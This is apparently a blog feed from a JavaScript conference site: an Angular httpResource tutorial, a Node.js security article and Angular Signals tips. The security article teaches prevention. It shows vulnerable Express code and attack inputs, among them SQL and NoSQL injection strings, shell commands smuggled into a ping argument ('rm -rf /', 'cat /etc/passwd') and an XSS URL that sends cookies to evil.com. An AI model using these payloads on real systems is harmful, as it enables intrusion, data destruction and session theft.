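    z.object({ tileKey: z.string(), col: z.number(), row: z.number() })
  ),
});

getLevelResourceValidated(levelKey: () => string) {
  return httpResource<Level>(() => `/levels/${levelKey()}.json`, {
    defaultValue: initLevel,
    // parse() throws on schema violations, which fails the resource load
    map: (raw) => LevelSchema.parse(raw) as Level,
  });
}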


Loading data other than JSON

By default, httpResource expects a JSON document, which it converts into a JavaScript object. However, it also offers other methods that provide other forms of representation:

  • httpResource.text returns text
  • httpResource.blob returns the retrieved data as a blob
  • httpResource.arrayBuffer returns the retrieved data as an ArrayBuffer

To demonstrate the use of these possibilities, the example discussed here requests an image with all possible tiles as a blob. From this blob, it derives the tiles required for the selected level style. Figure 3 shows a section of this tilemap and illustrates that the application can switch between the individual styles by choosing a horizontal or vertical offset.

Figure 3: Section of the tilemap used in the example (Source)

A TilesMapLoader delegates to httpResource.blob to load the tilemap (Listing 5).

Listing 5:

@Injectable({ providedIn: "root" })
export class TilesMapLoader {
  getTilesMapResource(): HttpResourceRef<Blob | undefined> {
    return httpResource.blob({
      url: "/tiles.png",
      reportProgress: true,
    });
  }
}

This resource also requests progress information, which the example uses to display the download progress to the left of the drop-down fields.

Putting it all together: reactive flow

The httpResources described in the last sections can now be combined into the reactive graph of the application (Figure 4).

Reactive flow of ngMario

Figure 4: Reactive flow of ngMario

The signals levelKey, style, and animation represent the user input. The first two correspond to the drop-down fields at the top of the application. The animation signal contains a Boolean that indicates whether the animation was started by clicking the Toggle Animation button (see screenshots above).

The tilesResource is a classic resource that derives the individual tiles for the selected style from the tilemap. To do this, it essentially delegates to a function of the game engine, which is treated as a black box here.

The rendering is triggered by an effect, especially since we cannot draw the level directly using data binding. It draws or animates the level on a canvas, which the application retrieves as a signal-based viewChild. Angular then calls the effect whenever the level (provided by the levelResource), the style, the animation flag, or the canvas changes.

The tilesMapProgress signal uses the progress information provided by the tilesMapResource to indicate how much of the tilemap has already been downloaded. To load the list of available levels, the example uses a levelOverviewResource that is not directly connected to the reactive graph discussed so far.

Listing 6 shows the implementation of this reactive flow in the form of fields of the LevelComponent.

Listing 6:

export class LevelComponent implements OnDestroy {
  private tilesMapLoader = inject(TilesMapLoader);
  private levelLoader = inject(LevelLoader);

  canvas = viewChild<ElementRef<HTMLCanvasElement>>("canvas");

  levelKey = linkedSignal<string | undefined>(() => this.getFirstLevelKey());
  style = signal<Style>("overworld");
  animation = signal(false);

  tilesMapResource = this.tilesMapLoader.getTilesMapResource();
  levelResource = this.levelLoader.getLevelResource(this.levelKey);
  levelOverviewResource = this.levelLoader.getLevelOverviewResource();

  tilesResource = createTilesResource(this.tilesMapResource, this.style);

  tilesMapProgress = computed(() =>
    calcProgress(this.tilesMapResource.progress())
  );

  constructor() {
    [...]
    effect(() => {
      this.render();
    });
  }

  reload() {
    this.tilesMapResource.reload();
    this.levelResource.reload();
  }

  private getFirstLevelKey(): string | undefined {
    return this.levelOverviewResource.value()?.levels?.[0]?.levelKey;
  }

  [...]
}

Using a linkedSignal for the levelKey allows us to use the first level as the default value as soon as the list of levels has been loaded. The getFirstLevelKey helper returns this from the levelOverviewResource.

The effect retrieves the named values from the respective signals and passes them to the engine’s animateLevel or renderLevel function (Listing 7).

Listing 7:

private render() {
  const tiles = this.tilesResource.value();
  const level = this.levelResource.value();
  const canvas = this.canvas()?.nativeElement;
  const animation = this.animation();

  if (!tiles || !canvas) {
    return;
  }

  if (animation) {
    animateLevel({
      canvas,
      level,
      tiles,
    });
  } else {
    renderLevel({
      canvas,
      level,
      tiles,
    });
  }
}

Resources and missing parameters

The tilesResource shown in the diagram simply delegates to the asynchronous extractTiles function, which the engine also provides (Listing 8).

Listing 8:

function createTilesResource(
  tilesMapResource: HttpResourceRef<Blob | undefined>,
  style: () => Style
) {
  // Reading value() inside the computed keeps the request reactive;
  // undefined prevents the resource from being triggered
  const request = computed(() => {
    const tilesMap = tilesMapResource.value();
    return !tilesMap
      ? undefined
      : {
          tilesMap,
          style: style(),
        };
  });

  return resource({
    request,
    loader: (params) => {
      const { tilesMap, style } = params.request!;
      return extractTiles(tilesMap, style);
    },
  });
}

This simple resource contains an interesting detail: before the tilemap is loaded, the tilesMapResource has the value undefined. However, we cannot call extractTiles without a tilesMap. The request signal takes this into account: it returns undefined if no tilesMap is available yet, so the resource does not trigger its loader.


Displaying Progress

The tilesMapResource was configured above to provide information about the download progress via its progress signal. A computed signal in the LevelComponent projects it into a string for display (Listing 9).

Listing 9:

function calcProgress(progress: HttpProgressEvent | undefined): string {
  if (!progress) {
    return "-";
  }

  if (progress.total) {
    const percent = Math.round((progress.loaded / progress.total) * 100);
    return percent + "%";
  }

  const kb = Math.round(progress.loaded / 1024);
  return kb + " KB";
}

If the server reports the file size, this function calculates a percentage for the portion already downloaded. Otherwise, it just returns the number of kilobytes already downloaded. There is no progress information before the download starts. In this case, only a hyphen is used.

To test this function, it makes sense to throttle the browser’s network connection in the developer tools and press the reload button in the application to instruct the resources to reload the data.

Status, header, error, and more

In case the application needs the status code or the headers of the HTTP response, the httpResource provides the corresponding signals:

console.log(this.levelOverviewResource.status());
console.log(this.levelOverviewResource.statusCode());
console.log(this.levelOverviewResource.headers()?.keys());

In addition, the httpResource provides everything that is also known from ordinary resources, including an error signal that provides information about any errors that may have occurred, as well as the option to update the value that is available as a local working copy.
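A short sketch of both (the backgroundColor tweak is arbitrary and only for illustration):

// React to a failed request via the error signal
if (this.levelResource.error()) {
  console.error('Loading the level failed');
}

// value is writable, so the local working copy can be adjusted without a reload
this.levelResource.value.update((level) => ({
  ...level,
  backgroundColor: '#000000',
}));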

Conclusion

The new httpResource is another building block that complements Angular’s new signal story. It allows data to be loaded within the reactive graph. Currently, it uses the HttpClient as an implementation detail, which may eventually be replaced by another solution at a later date.

While the HTTP resource also allows data to be retrieved using HTTP verbs other than GET, it is not designed to write data back to the server. This task still needs to be done in the conventional way.

The post Exploring httpResource in Angular 19.2 appeared first on International JavaScript Conference.

Common Vulnerabilities in Node.js Web Applications https://javascript-conference.com/blog/node-js-security-vulnerabilities-sql-xss-prevention/ Wed, 23 Apr 2025 07:44:46 +0000 https://javascript-conference.com/?p=107761 As Node.js is widely used to develop scalable and efficient web applications, understanding its vulnerabilities is crucial. In this article, we will explore common security risks, such as SQL injections and XSS attacks, and offer practical strategies to prevent them. By applying these insights, you'll learn how to protect user data and build more secure and reliable applications.

The post Common Vulnerabilities in Node.js Web Applications appeared first on International JavaScript Conference.

Node.js Overview

Node.js is an open-source, cross-platform server environment that enables server-side JavaScript. Since its initial release in 2009, it has grown to be a favorite among developers for building scalable and efficient web applications. Node.js is built on Chrome’s V8 JavaScript engine, which provides high speed and performance.

Another important feature of Node.js is its non-blocking, event-driven architecture. This model enables Node.js to handle many concurrent connections well, which is why it is used in real-time applications such as chat applications, online gaming, and live streaming. Its use of the familiar JavaScript language also eases its adoption.

"Diagram illustrating the Node.js system architecture, showing the interaction between the V8 JavaScript engine, Node.js bindings, the Libuv library, event loop, and asynchronous I/O operations including worker threads for file system, network, and process tasks.

Node.js Architecture

The Node.js architecture is designed to optimize performance and efficiency. It employs an event-driven, non-blocking I/O model to efficiently handle many tasks at a time without being slowed down by I/O operations.

Here are the main components of Node.js architecture:

  • Event Loop: The event loop is the heart of Node.js. It coordinates asynchronous I/O operations and keeps the application responsive. When Node.js performs an asynchronous operation, such as a file read or a network request, it registers a callback function and carries on executing other code. Once the operation is complete, the callback is queued in the event loop, which then calls it.
  • Non-blocking I/O: Node.js uses non-blocking I/O operations so that the application does not stall during time-consuming operations. Instead of blocking the thread and waiting for an operation to finish, Node.js continues executing other code, which lets it handle many tasks simultaneously on a single thread (see the sketch after this list).
  • Modules and Packages: Node.js has a large number of modules and packages that can easily be loaded into an application. The Node Package Manager (NPM) is currently the largest repository of open source software libraries in the world and is a treasure trove of modules that can help make your application better. However, the use of third-party packages also implies certain risks; if there is a vulnerability in a package, it can be easily exploited by an attacker.
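A minimal sketch of this model (the file name is arbitrary): the read is registered, execution continues immediately, and the callback runs later via the event loop.

const fs = require('fs');

// Register the asynchronous read and keep executing other code.
fs.readFile('./config.json', 'utf8', (err, data) => {
  if (err) throw err;
  console.log('file contents:', data); // runs once the I/O completes
});

console.log('this line runs first');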

Why Security is Crucial for Node.js Applications

As the usage of Node.js keeps on increasing, so does the need for strong security measures. The security of Node.js applications is important for several reasons:

  • Protecting Sensitive Data: Web applications often deal with sensitive data, including personal information, financial details, and login credentials. This data has to be protected to prevent unauthorized access and data breaches.
  • Maintaining User Trust: Users expect that their data and activity on an application are secure. A security breach can jeopardize users’ trust and the reputation of the organization.
  • Compliance with Regulations: Many industries are strictly regulated with respect to data security and privacy. Node.js applications must comply with such rules to avoid legal consequences and financial penalties.
  • Preventing Financial Loss: Security breaches are costly to organizations in terms of dollars and cents. These losses can be direct costs, such as fines and legal expenses, and indirect costs, including lost revenue and damage to the brand.
  • Mitigating Risks from Third-Party Packages: The use of third-party packages is common in Node.js applications and poses security risks. Flaws in these packages can be exploited by attackers to take over the application, so it is crucial to update and scan them frequently.

Common Vulnerabilities in Node.js Applications

Injection Attacks – SQL Injection

Overview: An SQL injection is a type of attack where an attacker can execute malicious SQL statements that control a web application’s database server. This is typically done by inserting or “injecting” malicious SQL code into a query.

Scenario 1: Consider a simple login form where a user inputs their username and password. The server-side code might look something like this:

const username = req.body.username;
const password = req.body.password;

const query = `SELECT * FROM users WHERE username = '${username}' AND password = '${password}'`;

db.query(query, (err, result) => {
  if (err) throw err;
  // Process result
});

If an attacker inputs admin' -- as the username and leaves the password blank, the query becomes:

SELECT * FROM users WHERE username = 'admin' --' AND password = ''

The -- sequence comments out the rest of the query, allowing the attacker to bypass authentication.

Solution: To prevent SQL injection, use parameterized queries or prepared statements. This ensures that user input is treated as data, not executable code.

const username = req.body.username;
const password = req.body.password;

const query = 'SELECT * FROM users WHERE username = ? AND password = ?';

db.query(query, [username, password], (err, result) => {
  if (err) throw err;
  // Process result
});

Scenario 2: Consider a simple Express application that retrieves a user from a database:

const express = require('express');
const mysql = require('mysql');

const app = express();

// Database connection
const connection = mysql.createConnection({
  host: 'localhost',
  user: 'root',
  password: 'password',
  database: 'users_db'
});

app.get('/user', (req, res) => {
  const userId = req.query.id;

  // VULNERABLE CODE: Direct concatenation of user input
  const query = "SELECT * FROM users WHERE id = " + userId;

  connection.query(query, (err, results) => {
    if (err) throw err;
    res.json(results);
  });
});

app.listen(3000);

The Attack

An attacker can exploit this by making a request like:

GET /user?id=1 OR 1=1

The resulting query becomes:

SELECT * FROM users WHERE id = 1 OR 1=1

Since 1=1 is always true, this returns ALL users in the database, exposing sensitive information.

More dangerous attacks might include:

GET /user?id=1; DROP TABLE users; --

This attempts to delete the entire users table.

Secure Solution

Here’s how to fix the vulnerability using parameterized queries:

app.get('/user', (req, res) => {
  const userId = req.query.id;

  // SECURE CODE: Using parameterized queries
  const query = "SELECT * FROM users WHERE id = ?";

  connection.query(query, [userId], (err, results) => {
    if (err) throw err;
    res.json(results);
  });
});

Best Practices to Prevent SQL Injection

  1. Use Parameterized Queries: Always use parameter placeholders (?) and pass values separately.
  2. ORM Libraries: Consider using ORM libraries like Sequelize or Prisma that handle parameterization automatically (see the sketch after this list).
  3. Input Validation: Validate user input (type, format, length) before using it in queries.
  4. Principle of Least Privilege: Database users should have minimal permissions needed for the application.
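As a sketch of point 2, an ORM such as Sequelize binds values as parameters internally; this assumes a User model has already been defined:

// Equivalent lookup through the ORM; the value is bound as a parameter,
// never concatenated into the SQL string.
const user = await User.findOne({
  where: { username: req.body.username },
});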


NoSQL Injection

Overview: NoSQL injection is similar to SQL injection but targets NoSQL databases like MongoDB. Attackers can manipulate queries to execute arbitrary commands.

Scenario 1: Consider a MongoDB query to find a user by username and password:

const username = req.body.username;
const password = req.body.password;

User.findOne({ username: username, password: password }, (err, user) => {
  if (err) throw err;
  // Process user
});

The Attack

If an attacker inputs { "$ne": "" } as the password, the query becomes:

User.findOne({ username: 'admin', password: { "$ne": "" } }, (err, user) => {
  if (err) throw err;
  // Process user
});

This query returns the first user where the password is not empty, potentially bypassing authentication.

Solution: To prevent NoSQL injection, sanitize user inputs and use libraries like mongo-sanitize to remove any characters that could be used in an injection attack.

const sanitize = require('mongo-sanitize');

const username = sanitize(req.body.username);
const password = sanitize(req.body.password);

User.findOne({ username: username, password: password }, (err, user) => {
  if (err) throw err;
  // Process user
});

Scenario 2: Consider a Node.js application that allows users to search for products with filtering options:

app.post('/products/search', async (req, res) => {
  const { category, sortField } = req.body;

  // VULNERABLE CODE: Directly using user input in aggregation pipeline
  const pipeline = [
    { $match: { category: category } },
    { $sort: { [sortField]: 1 } }, // Dangerous!
    { $limit: 20 }
  ];

  try {
    const products = await productsCollection.aggregate(pipeline).toArray();
    res.json(products);
  } catch (err) {
    res.status(500).json({ error: err.message });
  }
});

The Attack

An attacker could send a malicious payload:

{
  "category": "electronics",
  "sortField": "$function: { body: function() { return db.getSiblingDB('admin').auth('admin', 'password') } }"
}

This attempts to execute arbitrary JavaScript in the MongoDB server through the $function operator, potentially allowing database access control bypass or even server-side JavaScript execution.

Secure Solution

Here’s the fixed version:

app.post('/products/search', async (req, res) => {
  const { category, sortField } = req.body;

  // Validate category
  if (typeof category !== 'string') {
    return res.status(400).json({ error: "Invalid category format" });
  }

  // Validate sort field against allowlist
  const allowedSortFields = ['name', 'price', 'rating', 'date_added'];
  if (!allowedSortFields.includes(sortField)) {
    return res.status(400).json({ error: "Invalid sort field" });
  }

  // SECURE CODE: Using validated input
  const pipeline = [
    { $match: { category: category } },
    { $sort: { [sortField]: 1 } },
    { $limit: 20 }
  ];

  try {
    const products = await productsCollection.aggregate(pipeline).toArray();
    res.json(products);
  } catch (err) {
    res.status(500).json({ error: "An error occurred" });
  }
});

Key Takeaways:

  1. Validates the data type of the category parameter.
  2. Uses an allowlist approach for sortField, restricting possible values.
  3. Avoids exposing detailed error information to potential attackers.

Command Injection

Overview: Command injection occurs when an attacker can execute arbitrary commands on the host operating system via a vulnerable application. This typically happens when user input is passed directly to a system shell.

Example: Consider a Node.js application that uses the exec function to list files in a directory:

const { exec } = require('child_process');

const dir = req.body.dir;

exec(`ls ${dir}`, (err, stdout, stderr) => {
  if (err) throw err;
  // Process stdout
});

If an attacker inputs ; rm -rf /, the command becomes:

ls ; rm -rf /

This command lists the directory contents and then deletes the root directory, causing significant damage.

Solution: To prevent command injection, avoid using exec with unsanitized user input. Use safer alternatives like execFile or spawn, which do not invoke a shell.

const { execFile } = require('child_process');

const dir = req.body.dir;

execFile('ls', [dir], (err, stdout, stderr) => {
  if (err) throw err;
  // Process stdout
});

Scenario 2: Consider a Node.js application that allows users to ping a host to check connectivity:

const express = require('express');
const { exec } = require('child_process');

const app = express();
app.use(express.urlencoded({ extended: true }));

app.get('/ping', (req, res) => {
  const hostInput = req.query.host;

  // VULNERABLE CODE: Direct concatenation of user input into command
  const command = 'ping -c 4 ' + hostInput;

  exec(command, (error, stdout, stderr) => {
    if (error) {
      res.status(500).send(`Error: ${stderr}`);
      return;
    }
    res.send(`<pre>${stdout}</pre>`);
  });
});

app.listen(3000);

The Attack

An attacker could exploit this vulnerability by providing a malicious input:

/ping?host=google.com; cat /etc/passwd

The resulting command becomes:

ping -c 4 google.com; cat /etc/passwd

This would execute the ping command and then display the contents of the system’s password file, potentially exposing sensitive information. A more destructive payload is:

/ping?host=;rm -rf /*

This attempts to delete all files on the system (assuming adequate permissions).

Secure Solution

Here’s how to fix the vulnerability:

const express = require('express');
const { execFile } = require('child_process');

const app = express();
app.use(express.urlencoded({ extended: true }));

app.get('/ping', (req, res) => {
  const hostInput = req.query.host;

  // Input validation: Basic hostname format check
  if (!/^[a-zA-Z0-9][a-zA-Z0-9\.-]+$/.test(hostInput)) {
    return res.status(400).send('Invalid hostname format');
  }

  // SECURE CODE: Using execFile which doesn't invoke shell
  execFile('ping', ['-c', '4', hostInput], (error, stdout, stderr) => {
    if (error) {
      res.status(500).send('Error executing command');
      return;
    }
    res.send(`<pre>${stdout}</pre>`);
  });
});

app.listen(3000);

Best Practices to Prevent Command Injection

  1. Avoid shell execution: Use execFile or spawn instead of exec when possible, as they don’t invoke a shell.
  2. Input validation: Implement strict validation of user input using regex or other validation methods.
  3. Allowlists: Use allowlists to restrict inputs to known-good values.
  4. Use built-in APIs: When possible, use Node.js built-in modules instead of executing system commands (see the sketch after this list).
  5. Principle of least privilege: Run your Node.js application with minimal required system permissions.
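As a sketch of point 4, the built-in fs API can replace the ls command entirely, so no shell is involved and there is nothing to inject into:

const fs = require('fs/promises');

// Lists a directory without spawning a child process.
async function listDir(dir) {
  return fs.readdir(dir);
}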


Cross-Site Scripting (XSS) Attacks

Cross-site scripting is one of the most common security vulnerabilities in web applications. It allows attackers to inject malicious scripts into web pages viewed by other users. These scripts are then executed in the context of the victim’s browser, potentially resulting in data theft, session hijacking, and other malicious activity. An XSS vulnerability occurs when an application builds a web page from unvalidated input.

How XSS Occurs

XSS attacks happen when an attacker is able to inject malicious scripts into a web application and those scripts are executed in the victim’s browser, allowing the attacker to perform actions on behalf of the user or steal sensitive information.

How XSS Occurs in Node.js

XSS attacks can occur in Node.js applications when user input is not properly sanitized or encoded before being included in the HTML output. This can happen in various scenarios, such as displaying user comments, search results, or any other dynamic content.

Types of XSS Attacks

XSS vulnerabilities can be classified into three primary types:

  • Reflected XSS: The malicious script is reflected off a web server, such as in an error message or search result, and is immediately executed by the user’s browser.
  • Stored XSS: The malicious script is stored on the server, such as in a database, and is executed whenever the data is retrieved and displayed to users.
  • DOM-Based XSS: The vulnerability exists in the client-side code rather than the server-side code, and the malicious script is executed as a result of modifying the DOM environment.

Scenario 1: Consider a Node.js application that displays user comments without proper sanitization:

const express = require('express');

const app = express();
app.use(express.urlencoded({ extended: true }));

app.post('/comment', (req, res) => {
  const comment = req.body.comment;
  res.send(`<div><p>User comment: ${comment}</p></div>`);
});

app.listen(3000, () => {
  console.log('Server is running on port 3000');
});

If an attacker submits a comment containing a malicious script, such as:

<script>alert('XSS');</script>

The application will render the comment as:

<div>
  <p>User comment: <script>alert('XSS');</script></p>
</div>

When another user views the comment, the script will execute, displaying an alert box with the message “XSS”.

Prevention Techniques

To prevent XSS attacks in Node.js applications, developers should implement the following techniques:

  • Input Validation: Ensure that all user inputs are validated to conform to expected formats. Reject any input that contains potentially malicious content.
  • Output Encoding: Encode user inputs before displaying them in the browser. This ensures that any special characters are treated as text rather than executable code.
const express = require('express');
const escapeHtml = require('escape-html');

const app = express();
app.use(express.urlencoded({ extended: true }));

app.post('/comment', (req, res) => {
  const comment = escapeHtml(req.body.comment);
  res.send(`<div><p>User comment: ${comment}</p></div>`);
});

app.listen(3000, () => {
  console.log('Server is running on port 3000');
});

Here, escapeHtml is a function that converts special characters to their HTML entity equivalents.

  • Content Security Policy (CSP): Implement a Content Security Policy to restrict the sources from which scripts can be loaded. This helps prevent the execution of malicious scripts.
  • HTTP-Only and Secure Cookies: Use HTTP-only and secure flags for cookies to prevent them from being accessed by malicious scripts.
res.cookie('session', sessionId, { httpOnly: true, secure: true });

Scenario 2: Reflected XSS in a Search Feature

Here’s a simple Express application with an XSS vulnerability:

const express = require('express');

const app = express();

app.get('/search', (req, res) => {
  const searchTerm = req.query.q;

  // VULNERABLE CODE: Directly embedding user input in HTML response
  res.send(`
    <h1>Search Results for: ${searchTerm}</h1>
    <p>No results found.</p>
    <a href="/">Back to home</a>
  `);
});

app.listen(3000);

The Attack

An attacker could craft a malicious URL:

/search?q=<script>document.location='https://evil.com/stealinfo.php?cookie='+document.cookie</script>

When a victim visits this URL, the script executes in their browser, sending their cookies to the attacker’s server. This could lead to session hijacking and account takeover.

Secure Solutions

  1. Output Encoding
const express = require('express');

const app = express();

app.get('/search', (req, res) => {
  const searchTerm = req.query.q || '';

  // SECURE CODE: Encoding special characters
  const encodedTerm = searchTerm
    .replace(/&/g, '&amp;')
    .replace(/</g, '&lt;')
    .replace(/>/g, '&gt;')
    .replace(/"/g, '&quot;')
    .replace(/'/g, '&#039;');

  res.send(`
    <h1>Search Results for: ${encodedTerm}</h1>
    <p>No results found.</p>
    <a href="/">Back to home</a>
  `);
});

2. Using Template Engines

const express = require('express');

const app = express();

app.set('view engine', 'ejs');
app.set('views', './views');

app.get('/search', (req, res) => {
  const searchTerm = req.query.q || '';

  // SECURE CODE: Using EJS template engine with automatic escaping
  res.render('search', { searchTerm });
});
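
The matching views/search.ejs template could look like this (a sketch; the file name follows the views setting above, and EJS's <%= %> syntax HTML-escapes the interpolated value automatically):

<!-- views/search.ejs -->
<h1>Search Results for: <%= searchTerm %></h1>
<p>No results found.</p>
<a href="/">Back to home</a>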

3. Using Content Security Policy

const express = require('express');
const helmet = require('helmet');

const app = express();

// Add Content Security Policy headers
app.use(helmet.contentSecurityPolicy({
  directives: {
    defaultSrc: ["'self'"],
    scriptSrc: ["'self'"],
    styleSrc: ["'self'"],
  }
}));

app.get('/search', (req, res) => {
  // Even with encoding, adding CSP provides defense in depth
  const searchTerm = req.query.q || '';
  const encodedTerm = searchTerm
    .replace(/&/g, '&amp;')
    .replace(/</g, '&lt;')
    .replace(/>/g, '&gt;');

  res.send(`
    <h1>Search Results for: ${encodedTerm}</h1>
    <p>No results found.</p>
    <a href="/">Back to home</a>
  `);
});

Best Practices to Prevent XSS

  • Context-appropriate encoding: Encode output according to the context in which it will be rendered, whether HTML, JavaScript, CSS, or URL.
  • Use security libraries: When rendering user-supplied HTML, use a sanitization library such as DOMPurify, js-xss, or sanitize-html (see the sketch after this list).
  • Content Security Policy: Use CSP headers to restrict where scripts can be loaded from and whether they can execute.
  • Use modern frameworks: Frameworks like React, Vue, and Angular encode output for you by default.
  • X-XSS-Protection: This legacy header enabled browsers' built-in XSS filters; modern browsers have deprecated it and removed those filters, so rely on CSP instead.
  • HttpOnly cookies: Designate sensitive cookies as HttpOnly to prevent them from being accessed by JavaScript.
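
As a minimal sketch of the sanitization approach (assuming the sanitize-html package; the tag whitelist is illustrative and userComment stands in for the raw input):

const sanitizeHtml = require('sanitize-html');

// Keep a small whitelist of harmless formatting tags; everything else is stripped
const clean = sanitizeHtml(userComment, {
  allowedTags: ['b', 'i', 'em', 'strong', 'a'],
  allowedAttributes: { a: ['href'] },
});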

Following these practices will go a long way in ensuring that your Node.js applications are secure against XSS attacks, which are still very frequent in web applications.

EVERYTHING AROUND NODEJS

Explore the iJS Node.js & Backend Track

Conclusion

Security requires a comprehensive approach addressing all potential vulnerabilities. We discussed two of the most common threats that affect web applications:

SQL Injection

We explained how unsanitized user input in database queries can result in unauthorized data access or manipulation. To protect your applications:

  • Instead of string concatenation, use parameterized queries.
  • Alternatively, use a well-maintained ORM that parameterizes queries for you.
  • Validate all user inputs before processing.
  • Apply the principle of least privilege for database access.

Cross-Site Scripting (XSS)

We looked at how reflected XSS in a search feature can allow attackers to inject malicious scripts that are executed in users’ browsers. Essential defensive measures include:

  • Encoding of output where appropriate
  • Security libraries for HTML sanitization
  • Content Security Policy headers
  • Frameworks that offer protection against XSS
  • HttpOnly cookies for sensitive data

The post Common Vulnerabilities in Node.js Web Applications appeared first on International JavaScript Conference.

]]>
Professional Tips for Using Signals in Angular https://javascript-conference.com/blog/signals-angular-tips/ Wed, 05 Mar 2025 13:30:01 +0000 https://javascript-conference.com/?p=107575 Signals in Angular offer a powerful yet simple reactive programming model, but leveraging them effectively requires a solid understanding of best practices. In this guide, we explore expert techniques for using Signals in unidirectional data flow, integrating them with RxJS, avoiding race conditions, and optimizing performance. Whether you're new to Signals or looking to refine your approach, these professional tips will help you build seamless and efficient Angular applications.

The post Professional Tips for Using Signals in Angular appeared first on International JavaScript Conference.

]]>
The new Signals in Angular are a simple reactive building block. However, as is so often the case, the devil is in the detail. In this article, I will give three tips to help you use Signals in a more straightforward way. The examples used for this can be found here.

Guiding theory: Unidirectional data flow with signals

The approach for establishing a unidirectional data flow (Fig. 1) serves as the guiding theory for my three tips.

Fig. 1: Signals in Angular-Unidirectional data flow with a store

Fig. 1: Unidirectional data flow with a store

Handlers for UI events delegate to the store. I use the abstract term “intention”, since this process is different for different stores. With the Redux-based NgRx store, actions are dispatched; whereas with the lightweight NgRx Signal store, the component calls a method offered by the store.

The store executes synchronous or asynchronous tasks. These usually lead to a state change, which the application transports to the views of the individual components with signals. As part of this data flow, the state can be projected onto view models using computed, i.e. onto data structures that represent an individual use case's view of the state.

This approach is based on the fact that signals are primarily suitable for informing the view synchronously about data and data changes. They are less suitable for asynchronous tasks and for representing events. First, they don't offer a simple way of dealing with overlapping asynchronous requests and the resulting race conditions, and they cannot directly represent error states. Second, signals ignore the intermediate states of directly consecutive value changes. This desired property is called "glitch free".

For example, if a signal changes from 1 to 2 and immediately afterwards from 2 to 3, the consumer only receives a notification about the 3. This is also conducive to data binding performance, especially as updating with intermediate results would result in an unnecessary performance overhead.
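
A minimal standalone sketch of this behavior (the counter signal and the logging effect are hypothetical; effect must run in an injection context such as a component constructor):

import { signal, effect } from '@angular/core';

const counter = signal(1);
effect(() => console.log(counter()));

counter.set(2); // intermediate value
counter.set(3);
// Effects run asynchronously after the current task, so the effect logs 1
// on its initial run and later 3; the intermediate 2 never surfaces.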

iJS Newsletter

Keep up with JavaScript’s latest news!

Tip 1: Signals harmonize with RxJS

Signals are deliberately kept simple. That's why they offer fewer options than RxJS, which has been established in the Angular world for years. Thanks to the RxJS interop that Angular provides, the best of both worlds can be combined. Listing 1 demonstrates this. It converts the originalName and englishName signals into observables and implements a typeahead based on them. To do this, it uses the operators filter, debounceTime, and switchMap provided by RxJS. The latter prevents race conditions for overlapping requests by only using the most recent request: switchMap aborts requests that have already been started, unless they have already completed.

Listing 1

@Component({
  selector: 'app-desserts',
  standalone: true,
  imports: [DessertCardComponent, FormsModule, JsonPipe],
  templateUrl: './desserts.component.html',
  styleUrl: './desserts.component.css',
  changeDetection: ChangeDetectionStrategy.OnPush,
})
export class DessertsComponent {
  #dessertService = inject(DessertService);
  #ratingService = inject(RatingService);
  #toastService = inject(ToastService);

  originalName = signal('');
  englishName = signal('Cake');
  loading = signal(false);

  ratings = signal<DessertIdToRatingMap>({});
  ratedDesserts = computed(() => this.toRated(this.desserts(), this.ratings()));

  originalName$ = toObservable(this.originalName);
  englishName$ = toObservable(this.englishName);

  desserts$ = combineLatest({
    originalName: this.originalName$,
    englishName: this.englishName$,
  }).pipe(
    filter((c) => c.originalName.length >= 3 || c.englishName.length >= 3),
    debounceTime(300),
    tap(() => this.loading.set(true)),
    switchMap((c) =>
      this.#dessertService.find(c).pipe(
        catchError((error) => {
          this.#toastService.show('Error loading desserts!');
          console.error(error);
          return of([]);
        }),
      ),
    ),
    tap(() => this.loading.set(false)),
  );

  desserts = toSignal(this.desserts$, {
    initialValue: [],
  });
  
  […]
}

At the end, the resulting observable is converted into a signal so that the application can continue with the new Signals API. For performance reasons, the application should not switch between the two worlds too frequently.

In contrast to Figure 1, no store is used. Both the intention and the asynchronous action take place in the reactive data flow. If the data flow were outsourced to a service and the loaded data were shared with the shareReplay operator, this service could be regarded as a simple store. However, in line with Figure 1, even in the stage shown here, the component already hands over the execution of asynchronous tasks and receives signals at the end.

EVERYTHING AROUND ANGULAR

Explore the iJS Angular Development Track

RxJS in Stores

RxJS is also frequently used in stores, for example in NgRx in combination with Effects. The NgRx Signal Store, in turn, offers its own reactive methods that can be defined with rxMethod (Listing 2).

Listing 2

export const DessertStore = signalStore(
  { providedIn: 'root' },
  withState({
    filter: {
      originalName: '',
      englishName: 'Cake',
    },
    loading: false,
    ratings: {} as DessertIdToRatingMap,
    desserts: [] as Dessert[],
  }),
  […]
  withMethods(
    (
      store,
      dessertService = inject(DessertService),
      toastService = inject(ToastService),
    ) => ({
      
      […]
      loadDessertsByFilter: rxMethod<DessertFilter>(
        pipe(
          filter(
            (f) => f.originalName.length >= 3 || f.englishName.length >= 3,
          ),
          debounceTime(300),
          tap(() => patchState(store, { loading: true })),
          switchMap((f) =>
            dessertService.find(f).pipe(
              tapResponse({
                next: (desserts) => {
                  patchState(store, { desserts, loading: false });
                },
                error: (error) => {
                  toastService.show('Error loading desserts!');
                  console.error(error);
                  patchState(store, { loading: false });
                },
              }),
            ),
          ),
        ),
      ),
    }),
  ),
  withHooks({
    onInit(store) {
      const filter = store.filter;
      store.loadDessertsByFilter(filter);
    },
  }),
);

This example sets up a reactive method loadDessertsByFilter in the store. As it is defined with rxMethod, it receives an observable. The values of this observable pass through the defined pipe. As rxMethod automatically subscribes to this observable, the application code must receive the result of the data flow using tap or tapResponse. The latter is an operator from the @ngrx/operators package that combines the functionality of tap, catchError and finalize.

The consumer of a reactive method can pass a corresponding observable as well as a signal or a specific value. The onInit hook shown passes the filter signal. This means all values that the signal gradually picks up pass through the pipe in loadDessertsByFilter. This is where the glitch-free property comes into play.
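
A sketch of the three call variants (the store comes from Listing 2; filterSignal and filter$ are hypothetical placeholders for a signal and an observable of DessertFilter values):

const store = inject(DessertStore);

// Static value: the pipe runs once for this value
store.loadDessertsByFilter({ originalName: '', englishName: 'Cake' });

// Signal: the pipe re-runs whenever the signal changes
store.loadDessertsByFilter(filterSignal);

// Observable: the pipe re-runs on every emission
store.loadDessertsByFilter(filter$);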

It is interesting to note that rxMethod can also be used outside the signal store by design. For example, a component could use it to set up a reactive method.

Tip 2: Avoiding race conditions

Overlapping, asynchronous operations usually lead to undesirable race conditions. If users search for two different desserts in quick succession, both results are displayed one after the other; one of the two only flashes briefly before the other replaces it. Due to the asynchronous nature of the requests, the order in which results arrive doesn't have to match the order of the queries.

To prevent this confusing behavior, RxJS offers a few flattening operators:

  • switchMap
  • mergeMap
  • concatMap
  • exhaustMap

These operators differ in how they deal with overlapping requests. The switchMap only deals with the last search request. It cancels any queries that are already running when a new query arrives. This behavior corresponds to what users intuitively expect when working with search filters.

